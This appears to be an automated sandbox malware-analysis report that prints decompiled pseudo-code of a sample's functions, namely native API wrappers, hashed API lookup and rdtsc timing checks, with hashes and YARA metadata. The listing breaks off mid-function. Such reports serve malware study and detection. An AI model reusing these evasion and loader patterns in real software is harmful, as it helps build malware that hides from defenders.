                Function 0041A330 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 238 41a330-41a381 call 41af30 NtCreateFile
                C-Code - Quality: 100%
                			E0041A330(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				intOrPtr _t15;
				long _t21;
				void* _t31;

				_t15 = _a4;
				_t3 = _t15 + 0xc40; // 0xc40
				E0041AF30(_t31, _t15, _t3,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}






                0x0041a333
                0x0041a33f
                0x0041a347
                0x0041a37d
                0x0041a381

                APIs
                • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D
                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                • Instruction ID: 7ed6e6cb708c972561b0f9910f559a39af1ab3cc862b6eef20835abd22e26781
                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                • Instruction Fuzzy Hash: C4F0BDB2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E851CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041A510 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 242 41a510-41a54d call 41af30 NtAllocateVirtualMemory
                C-Code - Quality: 100%
                			E0041A510(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AF30(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                0x0041a51f
                0x0041a527
                0x0041a549
                0x0041a54d

                APIs
                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549
                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID: AllocateMemoryVirtual
                • String ID:
                • API String ID: 2167126740-0
                • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                • Instruction ID: 8b47746d7073478515a2f8fd1fb94e42dcc9ffa91ac9ff965dae3841ed3a313c
                • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                • Instruction Fuzzy Hash: 9CF015B2210208ABCB14DF89CC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041A45A Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 251 41a45a-41a489 call 41af30 NtClose
                C-Code - Quality: 100%
                			E0041A45A(void* __eax, void* __ecx, intOrPtr _a4, void* _a8) {
				long _t11;
				void* _t15;

				_t8 = _a4;
				_t2 = _t8 + 0x10; // 0x300
				_t3 = _t8 + 0xc50; // 0x40a943
				E0041AF30(_t15, _a4, _t3,  *_t2, 0, 0x2c);
				_t11 = NtClose(_a8); // executed
				return _t11;
			}





                0x0041a463
                0x0041a466
                0x0041a46f
                0x0041a477
                0x0041a485
                0x0041a489

                APIs
                • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485
                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID: Close
                • String ID:
                • API String ID: 3535843008-0
                • Opcode ID: a8e2578809e0d6b9c1d50abec3a9bdcc37ae46ee257f9af49f07144bd31fd702
                • Instruction ID: cdf3d8b757d3f569b9bd798600e91733a273244a01ffce3be97f2d6bb6650bbf
                • Opcode Fuzzy Hash: a8e2578809e0d6b9c1d50abec3a9bdcc37ae46ee257f9af49f07144bd31fd702
                • Instruction Fuzzy Hash: 67E08CB2210210ABDB20EBE48C45EE77BA8EF45764F144499BA889B242C130E60187D0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041A460 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 254 41a460-41a476 255 41a47c-41a489 NtClose 254->255 256 41a477 call 41af30 254->256 256->255
                C-Code - Quality: 100%
                			E0041A460(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a943
				E0041AF30(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                0x0041a463
                0x0041a466
                0x0041a46f
                0x0041a477
                0x0041a485
                0x0041a489

                APIs
                • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485
                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID: Close
                • String ID:
                • API String ID: 3535843008-0
                • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                • Instruction ID: e9450f8bec15428cdd91297f97b7848412804bda5c7d31b3f0e5b01193c95e83
                • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                • Instruction Fuzzy Hash: 3CD01776211214ABD710EB99CC85EE77BACEF48764F15449ABA189B242C530FA1186E0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00409AB0 Relevance: .1, Instructions: 92COMMON
                Download Yara Rule
                C-Code - Quality: 93%
                			E00409AB0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407EA0(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E004080B0( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041BDE0( &_v284, 0x104);
						E0041C450( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DF0(E00414D90(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe045
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080E0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408160(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                0x00409abb
                0x00409ac3
                0x00409ac5
                0x00409aca
                0x00409acf
                0x00409ae2
                0x00409ae7
                0x00409af0
                0x00409afc
                0x00409b0f
                0x00409b14
                0x00409b17
                0x00409b20
                0x00409b32
                0x00409b37
                0x00409b3c
                0x00000000
                0x00000000
                0x00409b3e
                0x00409b42
                0x00000000
                0x00000000
                0x00409b44
                0x00000000
                0x00409b42
                0x00409b46
                0x00409b49
                0x00409b4f
                0x00409b51
                0x00409b5c
                0x00409b61
                0x00409b64
                0x00409b71
                0x00409b7c
                0x00409b7e
                0x00409b84
                0x00409b88
                0x00409b8b
                0x00409b8b
                0x00409b92
                0x00409b95
                0x00409b9a
                0x00409ba7
                0x00409ad6
                0x00409ad6
                0x00409ad6

                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9491f0743c91a206193bdf4875b0116748c1939b63dea1d6f13f2d0be6304ac3
                • Instruction ID: 0cf1d1cfbff413d406b9f50454d57ab941c4b3e8ec75440de5a7d7d7e128ebbb
                • Opcode Fuzzy Hash: 9491f0743c91a206193bdf4875b0116748c1939b63dea1d6f13f2d0be6304ac3
                • Instruction Fuzzy Hash: 24210AB2D4020857CB25D664AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041A600 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 6 41a600-41a631 call 41af30 RtlAllocateHeap
                C-Code - Quality: 100%
                			E0041A600(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041AF30(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x414536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                0x0041a617
                0x0041a622
                0x0041a62d
                0x0041a631

                APIs
                • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A62D
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID: 6EA
                • API String ID: 1279760036-1400015478
                • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                • Instruction ID: 226561cf9c8a986873ffc081809f26ad69fcc4b20f94c9d7be20fabd3b8eb7db
                • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                • Instruction Fuzzy Hash: 24E012B1211208ABDB14EF99CC41EA777ACAF88664F118559BA085B242C630F911CAB0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 204 408310-40835a call 41be30 call 41c9d0 call 40acf0 call 414e50 213 40835c-40836e PostThreadMessageW 204->213 214 40838e-408392 204->214 215 408370-40838a call 40a480 213->215 216 40838d 213->216 215->216 216->214
                C-Code - Quality: 82%
                			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041BE30( &_v67, 0, 0x3f);
				E0041C9D0( &_v68, 3);
				_t12 = E0040ACF0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A480(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                0x00408310
                0x0040831f
                0x00408323
                0x0040832e
                0x0040833e
                0x0040834e
                0x00408353
                0x0040835a
                0x0040835d
                0x0040836a
                0x0040836c
                0x0040836e
                0x0040838b
                0x0040838b
                0x00000000
                0x0040838d
                0x00408392

                APIs
                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID:
                • API String ID: 1836367815-0
                • Opcode ID: 1eae49b1dd1fdf1f4ed343fddf3187855c82dbc596373200d6923005f005e771
                • Instruction ID: 43d593e10ad008c4695c17d6314bf6f3e92d4c432431edd93db89b762a987e15
                • Opcode Fuzzy Hash: 1eae49b1dd1fdf1f4ed343fddf3187855c82dbc596373200d6923005f005e771
                • Instruction Fuzzy Hash: E2018471A8032877E720A6959D43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041A640 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 245 41a640-41a671 call 41af30 RtlFreeHeap
                C-Code - Quality: 100%
                			E0041A640(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AF30(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                0x0041a64f
                0x0041a657
                0x0041a66d
                0x0041a671

                APIs
                • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                • Instruction ID: 3f65de21c9b51a2b7742007d51c6b1fad19b07b0b1b2c98d2bb582ee848745b4
                • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                • Instruction Fuzzy Hash: 1EE046B1210208ABDB18EF99CC49EE777ACEF88764F018559FE085B242C630F911CAF0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041A7A0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 248 41a7a0-41a7d4 call 41af30 LookupPrivilegeValueW
                C-Code - Quality: 100%
                			E0041A7A0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041AF30(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                0x0041a7ba
                0x0041a7d0
                0x0041a7d4

                APIs
                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7D0
                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID: LookupPrivilegeValue
                • String ID:
                • API String ID: 3899507212-0
                • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                • Instruction ID: a195d06a74d451d332e2306e76e7c3aa502b90bd3f16d73f11471c4c6d802808
                • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                • Instruction Fuzzy Hash: 2FE01AB12102086BDB10DF49CC85EE737ADAF88654F018155BA0857241C934E8118BF5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041A680 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 257 41a680-41a6a8 call 41af30 ExitProcess
                C-Code - Quality: 100%
                			E0041A680(intOrPtr _a4, int _a8) {
				int _t9;
				void* _t10;

				_t5 = _a4;
				E0041AF30(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				_t9 = _a8;
				ExitProcess(_t9);
			}





                0x0041a683
                0x0041a69a
                0x0041a69f
                0x0041a6a8

                APIs
                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8
                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID: ExitProcess
                • String ID:
                • API String ID: 621844428-0
                • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                • Instruction ID: 026b6f0270740822b369349059f6971daea101c61a9fac8a7aff4918670f7806
                • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                • Instruction Fuzzy Hash: C1D017726112187BD620EB99CC85FD777ACDF487A4F0180AABA1C6B242C531BA11CAE1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041A632 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                C-Code - Quality: 77%
                			E0041A632(void* __eax, void* __ecx, void* __edi, void* _a4, long _a8, void* _a12) {
				intOrPtr _v0;
				char _t15;
				int _t20;

				_push(cs);
				_t3 = __edi - 0x4f25f049;
				 *_t3 =  *((intOrPtr*)(__edi - 0x4f25f049)) - __eax;
				if( *_t3 != 0) {
					ExitProcess(_t20);
				}
				asm("cmc");
				_t12 = _v0;
				_t7 = _t12 + 0xc74; // 0xc74
				E0041AF30(__edi, _v0, _t7,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
				_t15 = RtlFreeHeap(_a4, _a8, _a12); // executed
				return _t15;
			}






                0x0041a634
                0x0041a635
                0x0041a635
                0x0041a63b
                0x0041a6a8
                0x0041a6a8
                0x0041a63f
                0x0041a643
                0x0041a64f
                0x0041a657
                0x0041a66d
                0x0041a671

                APIs
                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8
                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID: ExitProcess
                • String ID:
                • API String ID: 621844428-0
                • Opcode ID: 737869ba73fdbc03ff6d0deeec241aa35a4cff17d68eb597d7e2c7a27d987908
                • Instruction ID: cdd558c0f9ab08eabb88bc454379038a525055f107341fb7657a131c052a644f
                • Opcode Fuzzy Hash: 737869ba73fdbc03ff6d0deeec241aa35a4cff17d68eb597d7e2c7a27d987908
                • Instruction Fuzzy Hash: 5FB01240C4116723C81025750C2F4F7BB522C9070131D605BD8D410103E93CC132515F
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 00EA4194 Relevance: 80.0, APIs: 53, Instructions: 498COMMON
                Download Yara Rule
                C-Code - Quality: 92%
                			E00EA4194(intOrPtr* __eax, void* __edx, void* __edi, signed int __esi) {
				void* __ebx;
				signed int _t268;
				void* _t269;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t289;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				void* _t328;

				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(__eax + 0x6a)) =  *((intOrPtr*)(__eax + 0x6a)) + __edx;
				_push(_t269);
				_push(1);
				_push(_t328 - 8);
				_t275 = __esi | E00EB4CB1(_t269, __edi, __esi);
				_t276 = _t275 | E00EB4CB1(_t269, __edi, _t275, _t328 - 8, 1, _t269, 0x41, __edi + 0x8c);
				_t277 = _t276 | E00EB4CB1(_t269, __edi, _t276, _t328 - 8, 1, _t269, 0x42, __edi + 0x90);
				_t278 = _t277 | E00EB4CB1(_t269, __edi, _t277, _t328 - 8, 1, _t269, 0x43, __edi + 0x94);
				_t279 = _t278 | E00EB4CB1(_t269, __edi, _t278, _t328 - 8, 1, _t269, 0x28, __edi + 0x98);
				_t280 = _t279 | E00EB4CB1(_t269, __edi, _t279, _t328 - 8, 1, _t269, 0x29, __edi + 0x9c);
				_t281 = _t280 | E00EB4CB1(_t269, __edi, _t280, _t328 - 8, 1, _t269, 0x1f, __edi + 0xa0);
				_t282 = _t281 | E00EB4CB1(_t269, __edi, _t281, _t328 - 8, 1, _t269, 0x20, __edi + 0xa4);
				_t283 = _t282 | E00EB4CB1(_t269, __edi, _t282, _t328 - 8, 1, _t269, 0x1003, __edi + 0xa8);
				_t284 = _t283 | E00EB4CB1(_t269, __edi, _t283, _t328 - 8, 0, _t269, 0x1009, __edi + 0xac);
				_t285 = _t284 | E00EB4CB1(_t269, __edi, _t284, _t328 - 8, 2, _t269, 0x31, __edi + 0xb8);
				_t286 = _t285 | E00EB4CB1(_t269, __edi, _t285, _t328 - 8, 2, _t269, 0x32, __edi + 0xbc);
				_t287 = _t286 | E00EB4CB1(_t269, __edi, _t286, _t328 - 8, 2, _t269, 0x33, __edi + 0xc0);
				_t288 = _t287 | E00EB4CB1(_t269, __edi, _t287, _t328 - 8, 2, _t269, 0x34, __edi + 0xc4);
				_t289 = _t288 | E00EB4CB1(_t269, __edi, _t288, _t328 - 8, 2, _t269, 0x35, __edi + 0xc8);
				_t290 = _t289 | E00EB4CB1(_t269, __edi, _t289, _t328 - 8, 2, _t269, 0x36, __edi + 0xcc);
				_t291 = _t290 | E00EB4CB1(_t269, __edi, _t290, _t328 - 8, 2, _t269, 0x37, __edi + 0xb4);
				_t292 = _t291 | E00EB4CB1(_t269, __edi, _t291, _t328 - 8, 2, _t269, 0x2a, __edi + 0xd4);
				_t293 = _t292 | E00EB4CB1(_t269, __edi, _t292, _t328 - 8, 2, _t269, 0x2b, __edi + 0xd8);
				_t294 = _t293 | E00EB4CB1(_t269, __edi, _t293, _t328 - 8, 2, _t269, 0x2c, __edi + 0xdc);
				_t295 = _t294 | E00EB4CB1(_t269, __edi, _t294, _t328 - 8, 2, _t269, 0x2d, __edi + 0xe0);
				_t296 = _t295 | E00EB4CB1(_t269, __edi, _t295, _t328 - 8, 2, _t269, 0x2e, __edi + 0xe4);
				_t297 = _t296 | E00EB4CB1(_t269, __edi, _t296, _t328 - 8, 2, _t269, 0x2f, __edi + 0xe8);
				_t298 = _t297 | E00EB4CB1(_t269, __edi, _t297, _t328 - 8, 2, _t269, 0x30, __edi + 0xd0);
				_t299 = _t298 | E00EB4CB1(_t269, __edi, _t298, _t328 - 8, 2, _t269, 0x44, __edi + 0xec);
				_t300 = _t299 | E00EB4CB1(_t269, __edi, _t299, _t328 - 8, 2, _t269, 0x45, __edi + 0xf0);
				_t301 = _t300 | E00EB4CB1(_t269, __edi, _t300, _t328 - 8, 2, _t269, 0x46, __edi + 0xf4);
				_t302 = _t301 | E00EB4CB1(_t269, __edi, _t301, _t328 - 8, 2, _t269, 0x47, __edi + 0xf8);
				_t303 = _t302 | E00EB4CB1(_t269, __edi, _t302, _t328 - 8, 2, _t269, 0x48, __edi + 0xfc);
				_t304 = _t303 | E00EB4CB1(_t269, __edi, _t303, _t328 - 8, 2, _t269, 0x49, __edi + 0x100);
				_t305 = _t304 | E00EB4CB1(_t269, __edi, _t304, _t328 - 8, 2, _t269, 0x4a, __edi + 0x104);
				_t306 = _t305 | E00EB4CB1(_t269, __edi, _t305, _t328 - 8, 2, _t269, 0x4b, __edi + 0x108);
				_t307 = _t306 | E00EB4CB1(_t269, __edi, _t306, _t328 - 8, 2, _t269, 0x4c, __edi + 0x10c);
				_t308 = _t307 | E00EB4CB1(_t269, __edi, _t307, _t328 - 8, 2, _t269, 0x4d, __edi + 0x110);
				_t309 = _t308 | E00EB4CB1(_t269, __edi, _t308, _t328 - 8, 2, _t269, 0x4e, __edi + 0x114);
				_t310 = _t309 | E00EB4CB1(_t269, __edi, _t309, _t328 - 8, 2, _t269, 0x4f, __edi + 0x118);
				_t311 = _t310 | E00EB4CB1(_t269, __edi, _t310, _t328 - 8, 2, _t269, 0x38, __edi + 0x11c);
				_t312 = _t311 | E00EB4CB1(_t269, __edi, _t311, _t328 - 8, 2, _t269, 0x39, __edi + 0x120);
				_t313 = _t312 | E00EB4CB1(_t269, __edi, _t312, _t328 - 8, 2, _t269, 0x3a, __edi + 0x124);
				_t314 = _t313 | E00EB4CB1(_t269, __edi, _t313, _t328 - 8, 2, _t269, 0x3b, __edi + 0x128);
				_t315 = _t314 | E00EB4CB1(_t269, __edi, _t314, _t328 - 8, 2, _t269, 0x3c, __edi + 0x12c);
				_t316 = _t315 | E00EB4CB1(_t269, __edi, _t315, _t328 - 8, 2, _t269, 0x3d, __edi + 0x130);
				_t317 = _t316 | E00EB4CB1(_t269, __edi, _t316, _t328 - 8, 2, _t269, 0x3e, __edi + 0x134);
				_t318 = _t317 | E00EB4CB1(_t269, __edi, _t317, _t328 - 8, 2, _t269, 0x3f, __edi + 0x138);
				_t319 = _t318 | E00EB4CB1(_t269, __edi, _t318, _t328 - 8, 2, _t269, 0x40, __edi + 0x13c);
				_t320 = _t319 | E00EB4CB1(_t269, __edi, _t319, _t328 - 8, 2, _t269, 0x41, __edi + 0x140);
				_t321 = _t320 | E00EB4CB1(_t269, __edi, _t320, _t328 - 8, 2, _t269, 0x42, __edi + 0x144);
				_t322 = _t321 | E00EB4CB1(_t269, __edi, _t321, _t328 - 8, 2, _t269, 0x43, __edi + 0x148);
				_t323 = _t322 | E00EB4CB1(_t269, __edi, _t322, _t328 - 8, 2, _t269, 0x28, __edi + 0x14c);
				_t324 = _t323 | E00EB4CB1(_t269, __edi, _t323, _t328 - 8, 2, _t269, 0x29, __edi + 0x150);
				_t325 = _t324 | E00EB4CB1(_t269, __edi, _t324, _t328 - 8, 2, _t269, 0x1f, __edi + 0x154);
				_t326 = _t325 | E00EB4CB1(_t269, __edi, _t325, _t328 - 8, 2, _t269, 0x20, __edi + 0x158);
				_t268 = E00EB4CB1(_t269, __edi, _t326, _t328 - 8, 2, _t269, 0x1003, __edi + 0x15c) | _t326;
				return _t268;
			}



























































                0x00eb929c
                0x00eb929e
                0x00eb92a2
                0x00eb92a3
                0x00eb92a8
                0x00eb92b1
                0x00eb92c8
                0x00eb92df
                0x00eb92f6
                0x00eb9310
                0x00eb9327
                0x00eb933e
                0x00eb9355
                0x00eb9372
                0x00eb938c
                0x00eb93a3
                0x00eb93ba
                0x00eb93d4
                0x00eb93eb
                0x00eb9402
